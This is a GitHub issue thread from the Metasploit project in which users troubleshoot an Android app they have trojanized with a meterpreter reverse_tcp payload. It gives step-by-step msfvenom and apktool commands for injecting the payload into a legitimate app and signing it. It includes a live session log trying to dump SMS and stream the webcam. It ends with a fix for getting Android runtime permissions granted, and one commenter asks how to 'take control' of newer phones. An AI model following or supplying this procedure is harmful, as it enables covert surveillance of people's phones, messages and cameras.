### ISSUE TITLE
Some commands work some do not after embedding in an app created by me with Android Studio

### ISSUE THREAD

**Issue by mechaadi** [rapid7/metasploit-framework#10033]
## Steps to reproduce

How'd you do it?

1. Created the payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=......... LPORT=.......... -o payload.apk
2. decompiling it with
apktool d payload.apk -f -o payload
3. decompiling the original app
apktool d duggy.apk -f -o duggy
4. Copying the manifest files of payload to the original apk
5. Hooking the smali 
6. Recompiling the original app
7. Signing it with jarsigner

some commands like sysinfo, shell, ps, localtime etc are working
but webcam_stream, ls, record_mic, dump_sms, pwd etc are not working

## Expected behavior

What should happen?
It should work with all the commands

## Current behavior

What happens instead?
Only some of the commmands are working

You might also want to check the last ~1k lines of
`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
`~/.msf4/logs/framework.log` for relevant stack traces

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

Framework: 4.16.57-dev-
Console  : 4.16.57-dev-

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [x] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?
UBUNTU 16.04

**Comment by timwr** [comment]
Have you tried running `msfvenom -x blah.apk ...` on the apk produced by Android studio?

**Comment by mechaadi** [comment]
@timwr let me try

**Comment by mechaadi** [comment]
@timwr not working
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Sending stage (70071 bytes) to 10.9.0.1
[*] Meterpreter session 1 opened (10.9.20.118:4444 -> 10.9.0.1:43316) at 2018-05-16 02:58:57 +0530

meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > 
meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > dump_sms
[-] android_dump_sms: Operation failed: 1
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: LKNYUZSr.html
[*] Streaming...
[12699:12728:0516/030009.613809:ERROR:in_progress_cache_impl.cc(93)] Could not read download entries from file because there was a read failure.
ATTENTION: default value of option force_s3tc_enable overridden by environment.
[-] webcam_start: Operation failed: 1
meterpreter > [12699:12699:0516/030012.054495:ERROR:display_info_provider_aura.cc(31)] Not implemented reached in virtual void extensions::DisplayInfoProviderAura::UpdateDisplayUnitInfoForPlatform(const display::Display &, extensions::api::system_display::DisplayUnitInfo *)

and one more thing, while installing the app, it is not showing any permissions like camera, calls, sms etc. It just have its name on the top and two buttons at botton i.e., install and cancel.

**Comment by mechaadi** [comment]
@timwr if u want then I can send you the apk file of both the original app created by me using android studio and the payload embedded apk file created by metasploit

**Comment by mechaadi** [comment]
hmmm... so it is not working for on Lollipop 5.1.1 but not on Nougat 7.1.1, maybe I defined the Target sdk version to lollipop. Let me change it then will let you know if it works

**Comment by mechaadi** [comment]
no luck, anyone have a solution.?

**Comment by mechaadi** [comment]
Ok the problem seems to be solved, From android 6(Marshmallow) some terms and conditions are changed for "user permissions", it is called runtime user permissions, a message with two buttons will be shown to the user and then it's totally upto the user if he/she wants to give the permissions or not, so 
https://developer.android.com/training/permissions/requesting

This page have a great tutorial which tells you how to implement the runtime user permissions.

**Comment by mechaadi** [comment]
I'm closing this issue. Happy coding.

**Comment by bcoles** [comment]
@Farhad639 have you tried asking the developers of [Evil-Droid](https://github.com/M4sc3r4n0/Evil-Droid) ?

**Comment by Farhad639** [comment]
Sorry sir i didn't meant that...i just told my stage that for android
around "5" i was using evil-droid but it won't work for Android over 5...I
actually wanted to ask that can metasploit give us the permission to take
control on android 6 and more...I need further guidance about it...if yes
then how can i? (Need roughly guidance)

**Comment by Farhad639** [comment]
Secondly, Sir Can you please tell me where i can find evil-droid
discussions?Thanks.

**Comment by Farhad639** [comment]
waiting for reply mates....please help! Thank you!

**Comment by iy0205** [comment]
https://github.com/rapid7/metasploit-framework/issues/9397#issuecomment-452046514

**Comment by iy0205** [comment]
> waiting for reply mates....please help! Thank you!

https://github.com/rapid7/metasploit-framework/issues/9397#issuecomment-452046514
